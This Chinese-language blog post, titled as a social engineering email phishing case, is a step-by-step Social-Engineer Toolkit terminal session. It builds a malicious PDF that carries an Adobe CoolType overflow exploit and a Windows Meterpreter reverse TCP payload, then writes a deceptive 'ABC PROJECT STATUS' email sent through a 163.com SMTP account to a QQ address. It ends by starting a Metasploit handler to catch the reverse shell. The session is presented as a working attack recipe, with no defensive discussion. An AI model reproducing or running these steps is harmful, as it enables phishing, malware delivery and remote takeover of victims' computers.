社会工程学攻击案例-邮件钓鱼

社会工程学攻击案例-邮件钓鱼

BT5实现

root@bt:~# cd /pentest/exploits/set
root@bt:/pentest/exploits/set# ./set
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and ustener
5) Mass Mailer Attack
6) Arduino Based Atack vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) Third party Modules
10) update the Metasploit Framework
11) Update the soclal Engneer Tookut
12) Help, Credits, and About
99) Exit the Socal Engineer Toolkit
set > 1
1) Perform a Mass Email Attack
2) Create a FileFormat Payload
3) Create a Social-Engineering Template
99) Return to Main Menu
set:phishing > 1
1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2) SET Custom Written Document UNC LM SMB Capture Attack
3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
5) Adobe Flash Player "Button" Remote Code Execution
6) Adobe CoolType SING Table "uniqueName" Overflow
7) Adobe Flash Player "newfunction" Invalid Pointer Use
8) Adobe Collab. collectEmailInfo Buffer Overflow
9) Adobe Collab.getIcon Buffer Overflow
10) Adobe JBIG2Decode Memory Corruption Exploit
11) Adobe PDF Embedded EXE Social Engineering
12) Adobe util.printf() Buffer Overflow
13) Custom EXE to VBA (sent via RAR) (RAR required)
14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
15) Adobe PDF Embedded EXE Social Engineering (NOJS)
16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
17) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
set:payloads > 6
1) Windows Reverse TCP Shell
//Spawn a command shell on victim and send back to attacker
2) Windows Meterpreter Reverse_ _TCP
//Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse VNC DLL
//Spawn a VNC server on victim and send back to attacker
4) Windows Reverse TCP Shell (x64)
//Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_ TCP (X64) 
//Connect back to the attacker (Windows x64), Meterpreter
6) Windows Shell Bind_ TCP (X64)
//Execute payload and create an accepting port on remote system
7) Windows Meterpreter Reverse HTTPS
//Tunnel communication over HTTP using SSL and use Meterpreter
set:payloads > 2
set:payloads > Port to connect back on [443]:
ENTER
[-] Defaulting to port 443...
[-] Gene rating fileformat exploit...
[*] Payload creation complete.
[*] All payloads get sent to the src/ program_ junk/src/ program_ junk/template .pdf directory
[-] As an added bonus, use the file-format creator in SET to create your attachment.
Right now the attachment will be imported with filename of 'template.whatever'
Do you want to rename the file?
example Enter the new filename: moo.pdf
1.Keep the filename, I don't care.
2.Rename the file, I want to be cool.
set:phishing > 2
set:phishing > New filename: TEST.PDF
What do you want to do:
1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.
set:phishing > 1
Do you want to use a predefined template or craft
a one time email template.
1. Pre-Defined Template
2. One-Time Use Email Template
set:phishing > 2
set:phishing > Subject of the email: ABC PROJECT STATUS
set:phishing > Send the message as html or plain? 'h' or'p' [p]: p
set:phishing > Enter the body of the message, hit return for a new line. Control +C when finished:
Next line of the body: Hi Wang
Next line of the body: Please review the ABC project status report.
Next line of the body: Best Reguard!
Next line of the body: Li ming
Next line of the body: ^C
set:phishing > Send email to: 30330XXXX@qq.com
1. Use a gmail Account for your email attack.
2. Use your own server or open relay
set:phishing > 2
set: phishing > From address (ex: moo@example. com ): kejiXXX@163.com
set: phishing > Username for open-relay [blank]: kejiXXX
Password for open- relay [blank]:
set:phishing > SMTP email server address (ex.smtp.youremailserveryouown.com): smtp.163.com
set: phishing > Port number for the SMTP server [25]:
set:phishing > Flag this message/s as high priority? [yes |no]:yes
[*] SET has finished delivering the emails
set:phishing > Setup a listener [yes|no]:yes
resource (src/program_ junk/meta_ config)> use exploit/multi/handler
resource (src/program_ junk/meta_ config)> set PAYLOAD windows/meterpreter/reverse_ tcp
PAYLOAD => windows/ meterpreter/reverse_ tcp
resource (src/program_ junk/meta_ config)> set LHOST 10.10.10.131
LHOST => 10.10.10.131
resource (src/program_ junk/meta_ config)> set LPORT 443
LPORT => 443
resource (src/program_ junk/meta_ config)> set ENCODING shikata_ ga_ nai
ENCODING => shikata_ _ga_ nai
resource (src/ program_ junk/meta_ config)> set ExitOnSession false
ExitOnSession => false
resource (src/ program_ junk/meta_ config)> exploit j
[*] Explolt running as background job.
msf exploit(handler) >
[*] Started reverse handler on 10.10.10.131:443
[*] Starting the payload hander...

你可能感兴趣的:(Kali,Linux渗透测试)